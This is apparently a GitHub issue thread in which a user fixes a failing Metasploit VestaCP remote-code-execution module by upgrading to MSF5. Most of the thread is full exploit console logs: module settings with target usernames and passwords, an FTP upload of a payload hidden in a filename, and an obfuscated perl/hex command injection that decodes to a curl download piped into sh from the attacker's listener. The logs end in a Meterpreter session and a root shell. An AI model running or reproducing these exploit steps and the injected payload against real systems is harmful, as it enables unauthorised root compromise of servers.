Exploit failed: ArgumentError wrong number of arguments

[margo-gru]

I'm trying to exploit #13094 (comment)
Exploit is for Vesta Control Panel Remote Code Execution 0day
but I'm getting error while exploiting.
Current configuration is

Error is

Using Kali Linux, Metasploit version:
Framework: 4.17.24-dev
Console : 4.17.24-dev

Can you please help me with the error?

[mdisec]

Everything is working as expected for me with msf5.

msf5 exploit(linux/http/vestacp_exec) > version 
Framework: 5.0.89-dev-6034f48e8f
Console  : 5.0.89-dev-6034f48e8f

msf5 exploit(linux/http/vestacp_exec) > options 

Module options (exploit/linux/http/vestacp_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   mehmet           yes       The password to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.74.218   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8083             yes       The target port (TCP)
   SRVHOST    192.168.74.1     yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8081             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI of the vulnerable instance
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   mehmet           yes       The username to login as
   VHOST                       no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.74.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/http/vestacp_exec) > 
msf5 exploit(linux/http/vestacp_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.74.1:4444 
msf5 exploit(linux/http/vestacp_exec) > [*] 192.168.74.218:8083 - Using URL: http://192.168.74.1:8081/XOYCxA6tqHEoR
[*] 192.168.74.218:8083 - Second payload download URI is http://192.168.74.1:8081/XOYCxA6tqHEoR
[+] 192.168.74.218:21 - Successfully authenticated to the FTP service
[+] 192.168.74.218:21 - The file with the payload in the file name has been successfully uploaded.
[*] 192.168.74.218:8083 - Retrieving cookie and csrf token values
[+] 192.168.74.218:8083 - Cookie and CSRF token values successfully retrieved
[*] 192.168.74.218:8083 - Authenticating to HTTP Service with given credentials
[*] 192.168.74.218:8083 - Starting scheduled backup. Exploitation may take up to 5 minutes.
[+] 192.168.74.218:8083 - Scheduled backup has been started ! 
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[+] 192.168.74.218:8083 - First stage is executed ! Sending 2nd stage of the payload
[*] Sending stage (53755 bytes) to 192.168.74.218
[*] Meterpreter session 1 opened (192.168.74.1:4444 -> 192.168.74.218:34876) at 2020-05-14 16:55:32 +0300

msf5 exploit(linux/http/vestacp_exec) > sessions -i 1 
[*] Starting interaction with 1...

meterpreter > id

I am not sure these type of new modules are compatible with msf4 version that you are using.

[gwillcox-r7]

Indeed, we did change a lot in the framework between MSF4 and MSF5. MSF4 is no longer supported and has not received any updates since around January/February of this year when we ceased development on it after having supported both MSF4 and MSF5 for several months. If you are still receiving the error on MSF5, then I'll be happy to look into this further, but for the moment this sounds like it could be a case of just using an outdated version of the Framework as @mmetince mentioned.

[margo-gru]

@gwillcox-r7 @mmetince ,Thank you.
Okay, I'll Update the Metasploit framework and will see if it is working

[margo-gru]

Thank you @mmetince @gwillcox-r7 . IT WORKED!
After updating to MSF5,exploit worked as expected.

Module options (exploit/linux/http/vestacp_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   KyoqTdqsak       yes       The password to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.115.119.174   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8083             yes       The target port (TCP)
   SRVHOST    10.113.199.116   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI of the vulnerable instance
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       The username to login as
   VHOST                       no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.113.199.116   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/http/vestacp_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.113.199.116:4444
[*] 10.115.119.174:8083 - Using URL: http://10.113.199.116:8080/dDpSWt7nA
[*] 10.115.119.174:8083 - Second payload download URI is http://10.113.199.116:8080/dDpSWt7nA
msf5 exploit(linux/http/vestacp_exec) > [+] 10.115.119.174:21 - Successfully authenticated to the FTP service
[+] 10.115.119.174:21 - The file with the payload in the file name has been successfully uploaded.
[*] 10.115.119.174:8083 - Retrieving cookie and csrf token values
[+] 10.115.119.174:8083 - Cookie and CSRF token values successfully retrieved
[*] 10.115.119.174:8083 - Authenticating to HTTP Service with given credentials
[*] 10.115.119.174:8083 - Starting scheduled backup. Exploitation may take up to 5 minutes.
[+] 10.115.119.174:8083 - Scheduled backup has been started !
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[+] 10.115.119.174:8083 - First stage is executed ! Sending 2nd stage of the payload
[*] Sending stage (53755 bytes) to 10.115.119.174
[*] Meterpreter session 1 opened (10.113.199.116:4444 -> 10.115.119.174:42070) at 2020-05-14 20:24:56 -0700
[+] 10.115.119.174:8083 - Deleted /home/admin/.a';$(perl${IFS}-e${IFS}'system(pack(qq,H102,,qq,6375726c202d73534c20687474703a2f2f31302e3131332e3139392e3131363a383038302f644470535774376e41207c207368,))');'
[+] 10.115.119.174:8083 - Deleted /usr/local/vesta/data/users/admin/backup.conf
[+] 10.115.119.174:8083 - Payload appears to have executed in the background. Enjoy the shells <3

msf5 exploit(linux/http/vestacp_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 15126 created.
Channel 1 created.
sh: no job control in this shell
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0